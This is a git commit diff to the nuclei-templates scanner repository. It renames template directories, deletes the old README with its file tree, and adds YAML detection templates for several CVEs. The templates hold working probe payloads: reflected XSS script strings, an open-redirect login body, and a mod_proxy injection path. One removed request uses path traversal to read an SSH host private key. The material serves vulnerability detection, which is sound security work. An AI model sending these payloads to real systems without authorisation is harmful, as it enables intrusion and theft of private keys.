misc
commit
0b4c49e485
|
@ -13,16 +13,15 @@ An overview of the nuclei template directory including number of templates and H
|
|||
|
||||
### Nuclei templates `{version}` overview
|
||||
|
||||
| Templates | Counts | Templates | Counts |
|
||||
| ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
|
||||
| cves | {countTpl("cves/*")} | files | {countTpl("files")} |
|
||||
| vulnerabilities | {countTpl("vulnerabilities")} | panels | {countTpl("panels")} |
|
||||
| technologies | {countTpl("technologies")} | security-misconfiguration | {countTpl("security-misconfiguration")} |
|
||||
| workflows | {countTpl("workflows")} | tokens | {countTpl("tokens")} |
|
||||
| dns | {countTpl("dns")} | fuzzing | {countTpl("fuzzing")} |
|
||||
| generic-detections | {countTpl("generic-detections")} | default-credentials | {countTpl("default-credentials")} |
|
||||
| subdomain-takeover | {countTpl("subdomain-takeover")} | payloads | {countTpl("payloads")} |
|
||||
| wordlists | {countTpl("wordlists")} | misc | {countTpl("misc")} |
|
||||
| Templates | Counts | Templates | Counts |
|
||||
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||
| cves | {countTpl("cves/*")} | default-logins | {countTpl("default-logins/*")} |
|
||||
| dns | {countTpl("dns")} | exposed-panels | {countTpl("exposed-panels")} |
|
||||
| exposed-tokens | {countTpl("exposed-tokens/*")} | exposures | {countTpl("exposures/*")} |
|
||||
| fuzzing | {countTpl("fuzzing")} | helpers | {countTpl("helpers/*")} |
|
||||
| miscellaneous | {countTpl("miscellaneous")} | misconfiguration | {countTpl("misconfiguration")} |
|
||||
| takeovers | {countTpl("takeovers")} | technologies | {countTpl("technologies")} |
|
||||
| vulnerabilities | {countTpl("vulnerabilities/*")} | workflows | {countTpl("workflows")} |
|
||||
|
||||
|
||||
### Nuclei templates `{version}` tree overview
|
||||
|
|
|
@ -22,8 +22,8 @@ vulnerabilities/x-forwarded-host-injection.yaml
|
|||
fuzzing/
|
||||
|
||||
# Wordlist directory contains payload to be used with templates.
|
||||
wordlists/
|
||||
misc/
|
||||
helpers/
|
||||
miscellaneous/
|
||||
|
||||
# Workflows are excluded from default run to avoid duplicate scans.
|
||||
workflows/
|
497
README.md
497
README.md
|
@ -1,497 +0,0 @@
|
|||
|
||||
# Nuclei Templates
|
||||
|
||||
[![License](https://img.shields.io/badge/license-MIT-_red.svg)](https://opensource.org/licenses/MIT)
|
||||
[![GitHub Release](https://img.shields.io/github/release/projectdiscovery/nuclei-templates)](https://github.com/projectdiscovery/nuclei-templates/releases)
|
||||
[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/projectdiscovery/nuclei-templates/issues)
|
||||
[![Follow on Twitter](https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter)](https://twitter.com/pdnuclei)
|
||||
[![Chat on Discord](https://img.shields.io/discord/695645237418131507.svg?logo=discord)](https://discord.gg/KECAGdH)
|
||||
|
||||
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
|
||||
|
||||
An overview of the nuclei template directory including number of templates and HTTP request associated with each directory.
|
||||
|
||||
### Nuclei templates `v7.3.7` overview
|
||||
|
||||
| Templates | Counts | Templates | Counts |
|
||||
| ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
|
||||
| cves | 147 | files | 51 |
|
||||
| vulnerabilities | 43 | panels | 50 |
|
||||
| technologies | 41 | security-misconfiguration | 29 |
|
||||
| workflows | 17 | tokens | 8 |
|
||||
| dns | 6 | fuzzing | 6 |
|
||||
| generic-detections | 3 | default-credentials | 4 |
|
||||
| subdomain-takeover | 2 | payloads | 2 |
|
||||
| wordlists | 1 | misc | 14 |
|
||||
|
||||
|
||||
### Nuclei templates `v7.3.7` tree overview
|
||||
|
||||
<details>
|
||||
<summary> Nuclei templates </summary>
|
||||
|
||||
```
|
||||
├── LICENSE.md
|
||||
├── README.md
|
||||
├── cves
|
||||
│ ├── 2005
|
||||
│ │ └── CVE-2005-2428.yaml
|
||||
│ ├── 2008
|
||||
│ │ └── CVE-2008-2398.yaml
|
||||
│ ├── 2013
|
||||
│ │ └── CVE-2013-2251.yaml
|
||||
│ ├── 2014
|
||||
│ │ └── CVE-2014-6271.yaml
|
||||
│ ├── 2017
|
||||
│ │ ├── CVE-2017-10075.yaml
|
||||
│ │ ├── CVE-2017-11444.yaml
|
||||
│ │ ├── CVE-2017-12637.yaml
|
||||
│ │ ├── CVE-2017-14537.yaml
|
||||
│ │ ├── CVE-2017-14849.yaml
|
||||
│ │ ├── CVE-2017-5638.yaml
|
||||
│ │ ├── CVE-2017-7391.yaml
|
||||
│ │ ├── CVE-2017-7615.yaml
|
||||
│ │ ├── CVE-2017-9506.yaml
|
||||
│ │ └── CVE-2017-9841.yaml
|
||||
│ ├── 2018
|
||||
│ │ ├── CVE-2018-0296.yaml
|
||||
│ │ ├── CVE-2018-1000129.yaml
|
||||
│ │ ├── CVE-2018-11409.yaml
|
||||
│ │ ├── CVE-2018-11759.yaml
|
||||
│ │ ├── CVE-2018-1247.yaml
|
||||
│ │ ├── CVE-2018-1271.yaml
|
||||
│ │ ├── CVE-2018-1273.yaml
|
||||
│ │ ├── CVE-2018-13379.yaml
|
||||
│ │ ├── CVE-2018-13380.yaml
|
||||
│ │ ├── CVE-2018-14728.yaml
|
||||
│ │ ├── CVE-2018-16341.yaml
|
||||
│ │ ├── CVE-2018-16763.yaml
|
||||
│ │ ├── CVE-2018-17431.yaml
|
||||
│ │ ├── CVE-2018-18069.yaml
|
||||
│ │ ├── CVE-2018-19386.yaml
|
||||
│ │ ├── CVE-2018-19439.yaml
|
||||
│ │ ├── CVE-2018-20824.yaml
|
||||
│ │ ├── CVE-2018-2791.yaml
|
||||
│ │ ├── CVE-2018-3714.yaml
|
||||
│ │ ├── CVE-2018-3760.yaml
|
||||
│ │ ├── CVE-2018-5230.yaml
|
||||
│ │ └── CVE-2018-7490.yaml
|
||||
│ ├── 2019
|
||||
│ │ ├── CVE-2019-1010287.yaml
|
||||
│ │ ├── CVE-2019-10475.yaml
|
||||
│ │ ├── CVE-2019-11248.yaml
|
||||
│ │ ├── CVE-2019-11510.yaml
|
||||
│ │ ├── CVE-2019-11580.yaml
|
||||
│ │ ├── CVE-2019-11581.yaml
|
||||
│ │ ├── CVE-2019-11869.yaml
|
||||
│ │ ├── CVE-2019-12314.yaml
|
||||
│ │ ├── CVE-2019-12461.yaml
|
||||
│ │ ├── CVE-2019-12593.yaml
|
||||
│ │ ├── CVE-2019-12725.yaml
|
||||
│ │ ├── CVE-2019-14322.yaml
|
||||
│ │ ├── CVE-2019-14696.yaml
|
||||
│ │ ├── CVE-2019-14974.yaml
|
||||
│ │ ├── CVE-2019-15043.yaml
|
||||
│ │ ├── CVE-2019-15107.yaml
|
||||
│ │ ├── CVE-2019-15858.yaml
|
||||
│ │ ├── CVE-2019-16278.yaml
|
||||
│ │ ├── CVE-2019-1653.yaml
|
||||
│ │ ├── CVE-2019-16662.yaml
|
||||
│ │ ├── CVE-2019-16759-1.yaml
|
||||
│ │ ├── CVE-2019-16759.yaml
|
||||
│ │ ├── CVE-2019-16920.yaml
|
||||
│ │ ├── CVE-2019-17382.yaml
|
||||
│ │ ├── CVE-2019-17558.yaml
|
||||
│ │ ├── CVE-2019-18394.yaml
|
||||
│ │ ├── CVE-2019-19368.yaml
|
||||
│ │ ├── CVE-2019-19781.yaml
|
||||
│ │ ├── CVE-2019-19908.yaml
|
||||
│ │ ├── CVE-2019-19985.yaml
|
||||
│ │ ├── CVE-2019-20141.yaml
|
||||
│ │ ├── CVE-2019-2588.yaml
|
||||
│ │ ├── CVE-2019-2725.yaml
|
||||
│ │ ├── CVE-2019-3396.yaml
|
||||
│ │ ├── CVE-2019-3402.yaml
|
||||
│ │ ├── CVE-2019-3799.yaml
|
||||
│ │ ├── CVE-2019-5418.yaml
|
||||
│ │ ├── CVE-2019-6112.yaml
|
||||
│ │ ├── CVE-2019-6340.yaml
|
||||
│ │ ├── CVE-2019-6715.yaml
|
||||
│ │ ├── CVE-2019-7256.yaml
|
||||
│ │ ├── CVE-2019-7609.yaml
|
||||
│ │ ├── CVE-2019-8442.yaml
|
||||
│ │ ├── CVE-2019-8449.yaml
|
||||
│ │ ├── CVE-2019-8451.yaml
|
||||
│ │ ├── CVE-2019-8903.yaml
|
||||
│ │ ├── CVE-2019-8982.yaml
|
||||
│ │ ├── CVE-2019-9670.yaml
|
||||
│ │ ├── CVE-2019-9733.yaml
|
||||
│ │ └── CVE-2019-9978.yaml
|
||||
│ └── 2020
|
||||
│ ├── CVE-2020-0618.yaml
|
||||
│ ├── CVE-2020-10148.yaml
|
||||
│ ├── CVE-2020-10199.yaml
|
||||
│ ├── CVE-2020-10204.yaml
|
||||
│ ├── CVE-2020-11034.yaml
|
||||
│ ├── CVE-2020-1147.yaml
|
||||
│ ├── CVE-2020-11738.yaml
|
||||
│ ├── CVE-2020-12116.yaml
|
||||
│ ├── CVE-2020-12720.yaml
|
||||
│ ├── CVE-2020-13167.yaml
|
||||
│ ├── CVE-2020-13942.yaml
|
||||
│ ├── CVE-2020-14179.yaml
|
||||
│ ├── CVE-2020-14181.yaml
|
||||
│ ├── CVE-2020-14864.yaml
|
||||
│ ├── CVE-2020-14882.yaml
|
||||
│ ├── CVE-2020-15129.yaml
|
||||
│ ├── CVE-2020-15505.yaml
|
||||
│ ├── CVE-2020-15920.yaml
|
||||
│ ├── CVE-2020-16139.yaml
|
||||
│ ├── CVE-2020-16846.yaml
|
||||
│ ├── CVE-2020-16952.yaml
|
||||
│ ├── CVE-2020-17505.yaml
|
||||
│ ├── CVE-2020-17506.yaml
|
||||
│ ├── CVE-2020-17518.yaml
|
||||
│ ├── CVE-2020-17519.yaml
|
||||
│ ├── CVE-2020-2096.yaml
|
||||
│ ├── CVE-2020-2140.yaml
|
||||
│ ├── CVE-2020-23972.yaml
|
||||
│ ├── CVE-2020-24223.yaml
|
||||
│ ├── CVE-2020-24312.yaml
|
||||
│ ├── CVE-2020-2551.yaml
|
||||
│ ├── CVE-2020-25540.yaml
|
||||
│ ├── CVE-2020-26214.yaml
|
||||
│ ├── CVE-2020-3187.yaml
|
||||
│ ├── CVE-2020-3452.yaml
|
||||
│ ├── CVE-2020-4463.yaml
|
||||
│ ├── CVE-2020-5284.yaml
|
||||
│ ├── CVE-2020-5405.yaml
|
||||
│ ├── CVE-2020-5410.yaml
|
||||
│ ├── CVE-2020-5412.yaml
|
||||
│ ├── CVE-2020-5776.yaml
|
||||
│ ├── CVE-2020-5777.yaml
|
||||
│ ├── CVE-2020-5902.yaml
|
||||
│ ├── CVE-2020-6287.yaml
|
||||
│ ├── CVE-2020-7209.yaml
|
||||
│ ├── CVE-2020-7318.yaml
|
||||
│ ├── CVE-2020-7961.yaml
|
||||
│ ├── CVE-2020-8091.yaml
|
||||
│ ├── CVE-2020-8115.yaml
|
||||
│ ├── CVE-2020-8163.yaml
|
||||
│ ├── CVE-2020-8191.yaml
|
||||
│ ├── CVE-2020-8193.yaml
|
||||
│ ├── CVE-2020-8194.yaml
|
||||
│ ├── CVE-2020-8209.yaml
|
||||
│ ├── CVE-2020-8512.yaml
|
||||
│ ├── CVE-2020-8982.yaml
|
||||
│ ├── CVE-2020-9047.yaml
|
||||
│ ├── CVE-2020-9344.yaml
|
||||
│ ├── CVE-2020-9484.yaml
|
||||
│ ├── CVE-2020-9496.yaml
|
||||
│ └── CVE-2020-9757.yaml
|
||||
├── default-credentials
|
||||
│ ├── grafana-default-credential.yaml
|
||||
│ ├── rabbitmq-default-admin.yaml
|
||||
│ ├── solarwinds-default-admin.yaml
|
||||
│ └── tomcat-manager-default.yaml
|
||||
├── dns
|
||||
│ ├── azure-takeover-detection.yaml
|
||||
│ ├── cname-service-detector.yaml
|
||||
│ ├── dead-host-with-cname.yaml
|
||||
│ ├── mx-service-detector.yaml
|
||||
│ ├── servfail-refused-hosts.yaml
|
||||
│ └── spoofable-spf-records-ptr.yaml
|
||||
├── files
|
||||
│ ├── apc-info.yaml
|
||||
│ ├── cgi-test-page.yaml
|
||||
│ ├── composer-config.yaml
|
||||
│ ├── docker-registry.yaml
|
||||
│ ├── domcfg-page.yaml
|
||||
│ ├── druid-monitor.yaml
|
||||
│ ├── drupal-install.yaml
|
||||
│ ├── ds_store.yaml
|
||||
│ ├── elasticsearch.yaml
|
||||
│ ├── elmah-log-file.yaml
|
||||
│ ├── error-logs.yaml
|
||||
│ ├── exposed-alps-spring.yaml
|
||||
│ ├── exposed-kibana.yaml
|
||||
│ ├── exposed-svn.yaml
|
||||
│ ├── filezilla.yaml
|
||||
│ ├── firebase-detect.yaml
|
||||
│ ├── git-config.yaml
|
||||
│ ├── graylog-api-browser.yaml
|
||||
│ ├── htpasswd-detection.yaml
|
||||
│ ├── jkstatus-manager.yaml
|
||||
│ ├── jolokia.yaml
|
||||
│ ├── laravel-env.yaml
|
||||
│ ├── lazy-file.yaml
|
||||
│ ├── magento-config.yaml
|
||||
│ ├── owncloud-config.yaml
|
||||
│ ├── package-json.yaml
|
||||
│ ├── php-errors.yaml
|
||||
│ ├── phpinfo.yaml
|
||||
│ ├── public-tomcat-instance.yaml
|
||||
│ ├── redmine-db-config.yaml
|
||||
│ ├── server-private-keys.yaml
|
||||
│ ├── server-status-localhost.yaml
|
||||
│ ├── shell-history.yaml
|
||||
│ ├── sql-dump.yaml
|
||||
│ ├── syfmony-profiler.yaml
|
||||
│ ├── telerik-dialoghandler-detect.yaml
|
||||
│ ├── telerik-fileupload-detect.yaml
|
||||
│ ├── tomcat-scripts.yaml
|
||||
│ ├── trace-axd-detect.yaml
|
||||
│ ├── wadl-files.yaml
|
||||
│ ├── web-config.yaml
|
||||
│ ├── wordpress-db-backup.yaml
|
||||
│ ├── wordpress-debug-log.yaml
|
||||
│ ├── wordpress-directory-listing.yaml
|
||||
│ ├── wordpress-emergency-script.yaml
|
||||
│ ├── wordpress-installer-log.yaml
|
||||
│ ├── wordpress-tmm-db-migrate.yaml
|
||||
│ ├── wordpress-user-enumeration.yaml
|
||||
│ ├── wsdl-detect.yaml
|
||||
│ ├── xprober-service.yaml
|
||||
│ └── zip-backup-files.yaml
|
||||
├── fuzzing
|
||||
│ ├── arbitrary-file-read.yaml
|
||||
│ ├── basic-auth-bruteforce.yaml
|
||||
│ ├── directory-traversal.yaml
|
||||
│ ├── generic-lfi-fuzzing.yaml
|
||||
│ ├── iis-shortname.yaml
|
||||
│ └── wp-plugin-scan.yaml
|
||||
├── generic-detections
|
||||
│ ├── basic-xss-prober.yaml
|
||||
│ ├── general-tokens.yaml
|
||||
│ └── top-15-xss.yaml
|
||||
├── misc
|
||||
│ ├── basic-cors-flash.yaml
|
||||
│ ├── dir-listing.yaml
|
||||
│ ├── htaccess-config.yaml
|
||||
│ ├── missing-csp.yaml
|
||||
│ ├── missing-hsts.yaml
|
||||
│ ├── missing-x-frame-options.yaml
|
||||
│ ├── ntlm-directories.yaml
|
||||
│ ├── old-copyright.yaml
|
||||
│ ├── robots.txt.yaml
|
||||
│ ├── security.txt.yaml
|
||||
│ ├── trace-method.yaml
|
||||
│ ├── unencrypted-bigip-ltm-cookie.yaml
|
||||
│ ├── wp-xmlrpc.yaml
|
||||
│ └── xml-schema-detect.yaml
|
||||
├── panels
|
||||
│ ├── adminer-panel.yaml
|
||||
│ ├── aims-password-mgmt-client.yaml
|
||||
│ ├── atlassian-crowd-panel.yaml
|
||||
│ ├── cisco-asa-panel.yaml
|
||||
│ ├── citrix-adc-gateway-detect.yaml
|
||||
│ ├── citrix-vpn-detect.yaml
|
||||
│ ├── compal.yaml
|
||||
│ ├── crxde.yaml
|
||||
│ ├── docker-api.yaml
|
||||
│ ├── fortinet-fortigate-panel.yaml
|
||||
│ ├── fortiweb-panel.yaml
|
||||
│ ├── github-enterprise-detect.yaml
|
||||
│ ├── gitlab-detect.yaml
|
||||
│ ├── globalprotect-panel.yaml
|
||||
│ ├── go-anywhere-client.yaml
|
||||
│ ├── grafana-detect.yaml
|
||||
│ ├── identityguard-selfservice-entrust.yaml
|
||||
│ ├── iomega-lenovo-emc-shared-nas-detect.yaml
|
||||
│ ├── jenkins-asyncpeople.yaml
|
||||
│ ├── jmx-console.yaml
|
||||
│ ├── kubernetes-pods.yaml
|
||||
│ ├── manage-engine-admanager-panel.yaml
|
||||
│ ├── mobileiron-login.yaml
|
||||
│ ├── netscaler-gateway.yaml
|
||||
│ ├── network-camera-detect.yaml
|
||||
│ ├── oipm-detect.yaml
|
||||
│ ├── parallels-html-client.yaml
|
||||
│ ├── phpmyadmin-panel.yaml
|
||||
│ ├── polycom-admin-detect.yaml
|
||||
│ ├── pulse-secure-panel.yaml
|
||||
│ ├── rabbitmq-dashboard.yaml
|
||||
│ ├── rsa-self-service.yaml
|
||||
│ ├── sap-hana-xsengine-panel.yaml
|
||||
│ ├── sap-netweaver-detect.yaml
|
||||
│ ├── sap-recon-detect.yaml
|
||||
│ ├── solarwinds-orion.yaml
|
||||
│ ├── sonarqube-login.yaml
|
||||
│ ├── sonicwall-management-panel.yaml
|
||||
│ ├── sonicwall-sslvpn-panel.yaml
|
||||
│ ├── sophos-fw-version-detect.yaml
|
||||
│ ├── supervpn-panel.yaml
|
||||
│ ├── swagger-panel.yaml
|
||||
│ ├── tikiwiki-cms.yaml
|
||||
│ ├── traefik-dashboard.yaml
|
||||
│ ├── virtual-ema-detect.yaml
|
||||
│ ├── weave-scope-dashboard-detect.yaml
|
||||
│ ├── webeditors.yaml
|
||||
│ ├── webmin-panel.yaml
|
||||
│ ├── workspace-one-uem.yaml
|
||||
│ └── workspaceone-uem-airwatch-dashboard-detect.yaml
|
||||
├── payloads
|
||||
│ ├── CVE-2020-5776.csv
|
||||
│ └── CVE-2020-6287.xml
|
||||
├── security-misconfiguration
|
||||
│ ├── aem-groovyconsole.yaml
|
||||
│ ├── apache-tomcat-snoop.yaml
|
||||
│ ├── aspx-debug-mode.yaml
|
||||
│ ├── basic-cors.yaml
|
||||
│ ├── django-debug-detect.yaml
|
||||
│ ├── drupal-user-enum-ajax.yaml
|
||||
│ ├── drupal-user-enum-redirect.yaml
|
||||
│ ├── exposed-service-now.yaml
|
||||
│ ├── front-page-misconfig.yaml
|
||||
│ ├── jenkins-stack-trace.yaml
|
||||
│ ├── jira-service-desk-signup.yaml
|
||||
│ ├── jira-unauthenticated-dashboards.yaml
|
||||
│ ├── jira-unauthenticated-popular-filters.yaml
|
||||
│ ├── jira-unauthenticated-projects.yaml
|
||||
│ ├── jira-unauthenticated-user-picker.yaml
|
||||
│ ├── jupyter-ipython-unauth.yaml
|
||||
│ ├── larvel-debug.yaml
|
||||
│ ├── manage-engine-ad-search.yaml
|
||||
│ ├── put-method-enabled.yaml
|
||||
│ ├── rack-mini-profiler.yaml
|
||||
│ ├── salesforce-aura-misconfig.yaml
|
||||
│ ├── sidekiq-dashboard.yaml
|
||||
│ ├── springboot-detect.yaml
|
||||
│ ├── unauthenticated-airflow.yaml
|
||||
│ ├── unauthenticated-jenkin-dashboard.yaml
|
||||
│ ├── unauthenticated-nacos-access.yaml
|
||||
│ ├── wamp-xdebug-detect.yaml
|
||||
│ ├── wordpress-accessible-wpconfig.yaml
|
||||
│ └── zenphoto-installation-sensitive-info.yaml
|
||||
├── subdomain-takeover
|
||||
│ ├── detect-all-takeovers.yaml
|
||||
│ └── s3-subtakeover.yaml
|
||||
├── technologies
|
||||
│ ├── apache-detect.yaml
|
||||
│ ├── artica-web-proxy-detect.yaml
|
||||
│ ├── basic-auth-detection.yaml
|
||||
│ ├── bigip-config-utility-detect.yaml
|
||||
│ ├── cacti-detect.yaml
|
||||
│ ├── clockwork-php-page.yaml
|
||||
│ ├── couchdb-detect.yaml
|
||||
│ ├── favicon-detection.yaml
|
||||
│ ├── google-storage.yaml
|
||||
│ ├── graphql.yaml
|
||||
│ ├── home-assistant.yaml
|
||||
│ ├── jaspersoft-detect.yaml
|
||||
│ ├── jira-detect.yaml
|
||||
│ ├── kibana-detect.yaml
|
||||
│ ├── kong-detect.yaml
|
||||
│ ├── liferay-portal-detect.yaml
|
||||
│ ├── linkerd-badrule-detect.yaml
|
||||
│ ├── linkerd-ssrf-detect.yaml
|
||||
│ ├── lotus-domino-version.yaml
|
||||
│ ├── magmi-detect.yaml
|
||||
│ ├── mrtg-detect.yaml
|
||||
│ ├── netsweeper-webadmin-detect.yaml
|
||||
│ ├── nifi-detech.yaml
|
||||
│ ├── oidc-detect.yaml
|
||||
│ ├── pi-hole-detect.yaml
|
||||
│ ├── prometheus-exporter-detect.yaml
|
||||
│ ├── prometheus-exposed-panel.yaml
|
||||
│ ├── prtg-detect.yaml
|
||||
│ ├── redmine-cli-detect.yaml
|
||||
│ ├── s3-detect.yaml
|
||||
│ ├── sap-netweaver-as-java-detect.yaml
|
||||
│ ├── sap-netweaver-detect.yaml
|
||||
│ ├── shiro-detect.yaml
|
||||
│ ├── sql-server-reporting.yaml
|
||||
│ ├── tech-detect.yaml
|
||||
│ ├── terraform-detect.yaml
|
||||
│ ├── tomcat-detect.yaml
|
||||
│ ├── tor-socks-proxy.yaml
|
||||
│ ├── waf-detect.yaml
|
||||
│ ├── weblogic-detect.yaml
|
||||
│ └── werkzeug-debugger-detect.yaml
|
||||
├── tokens
|
||||
│ ├── amazon-mws-auth-token-value.yaml
|
||||
│ ├── aws-access-key-value.yaml
|
||||
│ ├── credentials-disclosure.yaml
|
||||
│ ├── fcm-server-key.yaml
|
||||
│ ├── google-api-key.yaml
|
||||
│ ├── http-username-password.yaml
|
||||
│ ├── mailchimp-api-key.yaml
|
||||
│ └── slack-access-token.yaml
|
||||
├── vulnerabilities
|
||||
│ ├── bullwark-momentum-series-directory-traversal.yaml
|
||||
│ ├── cached-aem-pages.yaml
|
||||
│ ├── couchdb-adminparty.yaml
|
||||
│ ├── crlf-injection.yaml
|
||||
│ ├── discourse-xss.yaml
|
||||
│ ├── easy-wp-smtp-listing.yaml
|
||||
│ ├── eclipse-help-system-xss.yaml
|
||||
│ ├── git-config-nginxoffbyslash.yaml
|
||||
│ ├── ibm-infoprint-directory-traversal.yaml
|
||||
│ ├── mcafee-epo-rce.yaml
|
||||
│ ├── microstrategy-ssrf.yaml
|
||||
│ ├── mida-eframework-xss.yaml
|
||||
│ ├── moodle-filter-jmol-lfi.yaml
|
||||
│ ├── moodle-filter-jmol-xss.yaml
|
||||
│ ├── nginx-module-vts-xss.yaml
|
||||
│ ├── nuuo-nvrmini2-rce.yaml
|
||||
│ ├── open-redirect.yaml
|
||||
│ ├── oracle-ebs-bispgraph-file-access.yaml
|
||||
│ ├── pdf-signer-ssti-to-rce.yaml
|
||||
│ ├── rails6-xss.yaml
|
||||
│ ├── rce-shellshock-user-agent.yaml
|
||||
│ ├── rce-via-java-deserialization.yaml
|
||||
│ ├── rconfig-rce.yaml
|
||||
│ ├── sassy-social-share.yaml
|
||||
│ ├── sick-beard-xss.yaml
|
||||
│ ├── springboot-actuators-jolokia-xxe.yaml
|
||||
│ ├── springboot-h2-db-rce.yaml
|
||||
│ ├── symantec-messaging-gateway.yaml
|
||||
│ ├── symfony-debugmode.yaml
|
||||
│ ├── thinkific-redirect.yaml
|
||||
│ ├── tikiwiki-reflected-xss.yaml
|
||||
│ ├── tomcat-manager-pathnormalization.yaml
|
||||
│ ├── twig-php-ssti.yaml
|
||||
│ ├── vmware-vcenter-lfi-linux.yaml
|
||||
│ ├── vmware-vcenter-lfi.yaml
|
||||
│ ├── vpms-auth-bypass.yaml
|
||||
│ ├── w3c-total-cache-ssrf.yaml
|
||||
│ ├── wems-manager-xss.yaml
|
||||
│ ├── wordpress-emails-verification-for-woocommerce.yaml
|
||||
│ ├── wordpress-social-metrics-tracker.yaml
|
||||
│ ├── wordpress-wordfence-xss.yaml
|
||||
│ ├── wordpress-wpcourses-info-disclosure.yaml
|
||||
│ └── zms-auth-bypass.yaml
|
||||
├── wordlists
|
||||
│ └── wp-plugins.txt
|
||||
└── workflows
|
||||
├── artica-web-proxy-workflow.yaml
|
||||
├── basic-auth-workflow.yaml
|
||||
├── bigip-workflow.yaml
|
||||
├── cisco-asa-workflow.yaml
|
||||
├── grafana-workflow.yaml
|
||||
├── jira-workflow.yaml
|
||||
├── liferay-workflow.yaml
|
||||
├── lotus-domino-workflow.yaml
|
||||
├── magmi-workflow.yaml
|
||||
├── mida-eframework-workflow.yaml
|
||||
├── netsweeper-workflow.yaml
|
||||
├── rabbitmq-workflow.yaml
|
||||
├── sap-netweaver-workflow.yaml
|
||||
├── solarwinds-orion-workflow.yaml
|
||||
├── springboot-workflow.yaml
|
||||
├── vbulletin-workflow.yaml
|
||||
└── wordpress-workflow.yaml
|
||||
```
|
||||
|
||||
</details>
|
||||
|
||||
**24 directories, 426 files**.
|
||||
|
||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding.
|
||||
|
||||
------
|
||||
**Notes:**
|
||||
1. Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/)) to validate new templates when sending pull requests.
|
||||
2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests.
|
||||
|
||||
Thanks again for your contribution and keeping the community vibrant. :heart:
|
|
@ -2,7 +2,7 @@ id: CVE-2017-9506
|
|||
|
||||
info:
|
||||
name: Jira IconURIServlet SSRF
|
||||
author: Ice3man
|
||||
author: pd-team
|
||||
severity: high
|
||||
description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
|
||||
|
||||
|
|
|
@ -0,0 +1,18 @@
|
|||
id: CVE-2018-7251
|
||||
|
||||
info:
|
||||
name: AnchorCMS Error Log Exposure
|
||||
author: pd-team
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/anchor/errors.log'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"date":'
|
||||
- '"message":'
|
||||
- '"trace":['
|
||||
condition: and
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2018-8006
|
||||
|
||||
info:
|
||||
name: Apache ActiveMQ XSS
|
||||
author: pd-team
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"><script>alert("1")</script>'
|
||||
- type: word
|
||||
words:
|
||||
- "/html"
|
||||
part: header
|
|
@ -0,0 +1,15 @@
|
|||
id: CVE-2019-10092
|
||||
|
||||
info:
|
||||
name: Apache mod_proxy HTML Injection / Partial XSS
|
||||
author: pd-team
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/%5cgoogle.com/evil.html'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<a href=\"/\\google.com/evil.html\">"
|
|
@ -0,0 +1,19 @@
|
|||
id: CVE-2019-14223
|
||||
|
||||
info:
|
||||
name: Alfresco Share Open Redirect
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/share/page/dologin'
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: success=%2Fshare%2Fpage%2F&failure=:\\google.com&username=baduser&password=badpass
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?google\\.com(?:\\s*)$"
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2019-7219
|
||||
|
||||
info:
|
||||
name: Zarafa WebApp Reflected XSS
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/webapp/?fccc0\"><script>alert(1)</script>5f43d=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "\"><script>alert(1)</script>"
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,18 @@
|
|||
id: CVE-2019-9955
|
||||
|
||||
info:
|
||||
name: CVE-2019-9955 Zyxel XSS
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?mobile=1&mp_idx=%22;alert(%271%27);//"
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "\";alert('1');//"
|
||||
- "<title>Welcome</title>"
|
||||
condition: and
|
|
@ -17,12 +17,6 @@ requests:
|
|||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}:8060
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
@ -31,14 +25,6 @@ requests:
|
|||
